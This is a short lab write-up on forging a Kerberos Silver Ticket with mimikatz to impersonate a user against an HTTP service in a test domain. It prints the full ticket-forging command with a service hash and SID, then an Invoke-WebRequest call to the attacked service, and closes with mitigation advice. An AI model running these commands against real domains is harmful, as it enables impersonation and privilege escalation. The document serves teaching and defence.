Comment on page
Kerberos: Silver Tickets
This lab looks at the technique of forging a cracked TGS Kerberos ticket in order to impersonate another user and escalate privileges from the perspective of a service the TGS was cracked for.
I will be using mimikatz to create a Kerberos Silver Ticket - forging/rewriting the cracked ticket with some new details that benefit me as an attacker.
Below is a table with values supplied to mimikatz explained and the command itself:
Getting our user's SID as explained in the first step in the above table:
Getting a user's SID
Issuing the final mimikatz command to create our forged (silver) ticket:
mimikatz # kerberos::golden /sid:S-1-5-21-4172452648-1021989953-2368502130-1105 /domain:offense.local /ptt /id:1155 /target:dc-mantvydas.offense.local /service:http /rc4:a87f3a337d73085c45f9416be5787d86 /user:beningnadmin
Checking available tickets in memory with
klist- note how the ticket shows our forged username
benignadminand a forged user id:
Note in the above mimikatz window the
Group IDswhich our fake user
benignadminis now a member of due to the forged ticket:
Initiating a request to the attacked service with a TGS ticket - note that the authentication is successfull:
Invoke-WebRequest -UseBasicParsing -UseDefaultCredentials http://dc-mantvydas.offense.local
Note a network logon from
benignadminas well as forged RIDs:
It is better not to use user accounts for running services on them, but if you do, make sure to use really strong passwords! Computer accounts generate long and complex passwords and they change frequently, so they are better suited for running services on. Better yet, follow good practices such as using Group Managed Service Accounts for running more secure services.